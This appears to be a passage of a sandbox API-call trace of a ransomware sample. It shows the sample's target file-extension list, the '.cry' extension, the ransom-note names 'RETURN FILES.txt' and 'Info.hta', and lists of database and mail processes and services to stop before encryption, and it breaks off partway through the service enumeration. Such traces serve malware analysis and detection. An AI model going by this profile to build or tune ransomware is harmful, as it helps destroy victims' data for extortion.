Flags=0x0, Ptr=0x65b6e0, Size=0x100) returned 0x64bf88 [0033.666] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64bbc0, Size=0x104) returned 0x64c090 [0033.666] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64bc50, Size=0x200) returned 0x64c1a0 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x63a308 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64c1a0 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64b7d8 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65b768 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64e180 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65b7f0 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64e1b0 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64c090 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64e198 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64be78 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64b7f0 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64bde8 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64b808 | out: hHeap=0x600000) returned 1 [0033.667] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64e198, Size=0x20) returned 0x635b00 [0033.667] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635b00, Size=0x40) returned 0x636c48 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x63a2d8 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64e120 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64b730 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64e150 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64bf88 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64e138 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x63a2e8 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64e168 | out: hHeap=0x600000) returned 1 [0033.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x638048 | out: hHeap=0x600000) returned 1 [0033.668] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x636160 | out: hHeap=0x600000) returned 1 [0033.668] lstrlenW (lpString="%systemdrive%") returned 13 [0033.668] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635ad8 | out: hHeap=0x600000) returned 1 [0033.668] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65b5d0 | out: hHeap=0x600000) returned 1 [0033.668] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x63a2b8 | out: hHeap=0x600000) returned 1 [0033.668] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x63b5a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x100 [0033.668] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64e168, Size=0x20) returned 0x635b00 [0033.668] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635b00, Size=0x40) returned 0x636c90 [0033.668] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636c90, Size=0x80) returned 0x65b5d0 [0033.668] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x65b5d0, Size=0x100) returned 0x64bbc0 [0033.668] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64bbc0, Size=0x200) returned 0x64bbc0 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64bbc0, Size=0x400) returned 0x64bbc0 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64bbc0, Size=0x800) returned 0x64bbc0 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64bbc0, Size=0x1000) returned 0x6501e0 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a2b8, Size=0x8) returned 0x63a2d8 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a2d8, Size=0x10) returned 0x64e180 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64e180, Size=0x20) returned 0x635b00 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635b00, Size=0x40) returned 0x636c90 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636c90, Size=0x80) returned 0x65b5d0 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x65b5d0, Size=0x100) returned 0x651200 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x651200, Size=0x200) returned 0x64bfc0 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64bfc0, Size=0x400) returned 0x6531e8 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6531e8, Size=0x800) returned 0x6541f0 [0033.669] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0033.669] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6501e0 | out: hHeap=0x600000) returned 1 [0033.669] lstrlenW (lpString="") returned 0 [0033.669] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x655070 | out: hHeap=0x600000) returned 1 [0033.669] lstrlenW (lpString=".cry") returned 4 [0033.669] lstrlenW (lpString=".cry") returned 4 [0033.669] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x655070 | out: hHeap=0x600000) returned 1 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6550a0, Size=0x20) returned 0x635b00 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635b00, Size=0x40) returned 0x636c90 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636c90, Size=0x80) returned 0x65b5d0 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a458, Size=0x8) returned 0x63a468 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a468, Size=0x10) returned 0x6550a0 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6550a0, Size=0x20) returned 0x635b50 [0033.669] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0033.669] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65b5d0 | out: hHeap=0x600000) returned 1 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6550d0, Size=0x20) returned 0x635b78 [0033.669] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635b78, Size=0x40) returned 0x636c90 [0033.670] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0033.670] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0033.670] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x636c90 | out: hHeap=0x600000) returned 1 [0033.670] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6550d0, Size=0x20) returned 0x635b78 [0033.670] lstrlenW (lpString="Info.hta") returned 8 [0033.670] lstrlenW (lpString="Info.hta") returned 8 [0033.670] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635b78 | out: hHeap=0x600000) returned 1 [0033.670] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x67d5e0, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 0x67 [0033.670] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67d5e0 | out: hHeap=0x600000) returned 1 [0033.670] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0033.670] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635b50, Size=0x40) returned 0x636c90 [0033.670] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6550d0, Size=0x20) returned 0x635b50 [0033.670] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6550d0, Size=0x20) returned 0x635b78 [0033.670] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635b78, Size=0x40) returned 0x636cd8 [0033.670] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636cd8, Size=0x80) returned 0x65b5d0 [0033.670] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x65b5d0, Size=0x100) returned 0x651200 [0033.670] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0033.670] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x651200 | out: hHeap=0x600000) returned 1 [0033.670] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x67d5e0, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0033.670] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x68d5e8 | out: hHeap=0x600000) returned 1 [0033.670] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67d5e0 | out: hHeap=0x600000) returned 1 [0033.670] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a468, Size=0x8) returned 0x63a458 [0033.670] lstrlenW (lpString="%windir%;") returned 9 [0033.670] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635b50 | out: hHeap=0x600000) returned 1 [0033.670] lstrlenW (lpString="C:\\Windows;") returned 11 [0033.670] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x66d5d8 | out: hHeap=0x600000) returned 1 [0033.670] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6550e8, Size=0x20) returned 0x635b50 [0033.670] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635b50, Size=0x40) returned 0x636cd8 [0033.670] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636cd8, Size=0x80) returned 0x65b5d0 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x65b5d0, Size=0x100) returned 0x651200 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a498, Size=0x8) returned 0x63a4a8 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a4a8, Size=0x10) returned 0x655130 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x655130, Size=0x20) returned 0x635b50 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a468, Size=0x8) returned 0x63a4a8 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a478, Size=0x8) returned 0x63a468 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a498, Size=0x8) returned 0x63a4b8 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a4b8, Size=0x10) returned 0x6551d8 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6551d8, Size=0x20) returned 0x635b78 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a4a8, Size=0x10) returned 0x6551d8 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a468, Size=0x10) returned 0x650210 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a4a8, Size=0x8) returned 0x63a498 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a4c8, Size=0x8) returned 0x63a4d8 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6551d8, Size=0x20) returned 0x635ba0 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x650210, Size=0x20) returned 0x635bc8 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a4e8, Size=0x8) returned 0x63a4f8 [0033.671] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0033.671] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x651200 | out: hHeap=0x600000) returned 1 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6502a0, Size=0x20) returned 0x635c18 [0033.671] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x66d5d8, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0033.671] lstrlenW (lpString="C:\\") returned 3 [0033.671] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0033.671] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x66d5d8 | out: hHeap=0x600000) returned 1 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x653200, Size=0x82) returned 0x6509e0 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x653220, Size=0x100) returned 0x651200 [0033.671] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6509e0, Size=0x104) returned 0x650b90 [0033.672] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x650a70, Size=0x104) returned 0x650ca0 [0033.672] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x65b7f0, Size=0x100) returned 0x651308 [0033.672] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x651200, Size=0x200) returned 0x655210 [0033.672] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x653210 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x655210 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x650348 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65b768 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x650300 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65b6e0 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x650330 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x650b90 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x650318 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x650ca0 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x650360 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x650b00 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x650378 | out: hHeap=0x600000) returned 1 [0033.673] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x650378, Size=0x20) returned 0x635c40 [0033.673] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635c40, Size=0x40) returned 0x636cd8 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x63a508 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6502a0 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64c108 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6502d0 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x651308 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6502b8 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x63a518 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6502e8 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64c0d8 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x636260 | out: hHeap=0x600000) returned 1 [0033.673] lstrlenW (lpString="%systemdrive%") returned 13 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635c18 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65b5d0 | out: hHeap=0x600000) returned 1 [0033.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x63a4e8 | out: hHeap=0x600000) returned 1 [0033.673] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x65d5b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10c [0033.674] WaitForMultipleObjects (nCount=0x2, lpHandles=0x637da8*=0x100, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0x9b0 Thread: id = 4 os_tid = 0x9bc [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6502e8 [0033.837] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6502e8, Size=0x20) returned 0x635c40 [0033.837] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635c40, Size=0x40) returned 0x636d20 [0033.837] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636d20, Size=0x80) returned 0x65b5d0 [0033.837] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x65b5d0, Size=0x100) returned 0x651308 [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6502e8 [0033.837] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6502e8, Size=0x20) returned 0x635c40 [0033.837] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635c40, Size=0x40) returned 0x636d20 [0033.837] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636d20, Size=0x80) returned 0x65b5d0 [0033.837] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x65b5d0, Size=0x100) returned 0x651200 [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x6502e8 [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x63a4e8 [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6502b8 [0033.837] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a4e8, Size=0x8) returned 0x63a518 [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x14) returned 0x636280 [0033.837] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a518, Size=0x10) returned 0x6502d0 [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x18) returned 0x6362a0 [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1a) returned 0x635c40 [0033.837] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6502d0, Size=0x20) returned 0x635c68 [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1c) returned 0x635c90 [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x16) returned 0x6362c0 [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1a) returned 0x635cb8 [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x6502d0 [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x63a518 [0033.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40) returned 0x636d20 [0033.837] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a518, Size=0x8) returned 0x63a4e8 [0033.838] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x3c) returned 0x636d68 [0033.838] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a4e8, Size=0x10) returned 0x6502a0 [0033.838] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x14) returned 0x6362e0 [0033.838] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x18) returned 0x636300 [0033.838] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6502a0, Size=0x20) returned 0x635ce0 [0033.838] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x24) returned 0x64c110 [0033.838] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0033.838] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x651308 | out: hHeap=0x600000) returned 1 [0033.838] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0033.838] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x651200 | out: hHeap=0x600000) returned 1 [0033.838] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x635d80 [0033.838] EnumServicesStatusExW (in: hSCManager=0x635d80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0033.838] GetLastError () returned 0xea [0033.838] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x11e4) returned 0x66e618 [0033.838] EnumServicesStatusExW (in: hSCManager=0x635d80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x66e618, cbBufSize=0x11e4, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x66e618, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0033.839] CloseServiceHandle (hSCObject=0x635d80) returned 1 [0033.839] lstrlenW (lpString="Appinfo") returned 7 [0033.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0033.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0033.839] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0033.839] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0033.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0033.839] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0033.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0033.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0033.840] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0033.840] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0033.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0033.840] lstrlenW (lpString="AudioSrv") returned 8 [0033.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0033.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0033.840] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0033.840] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0033.840] 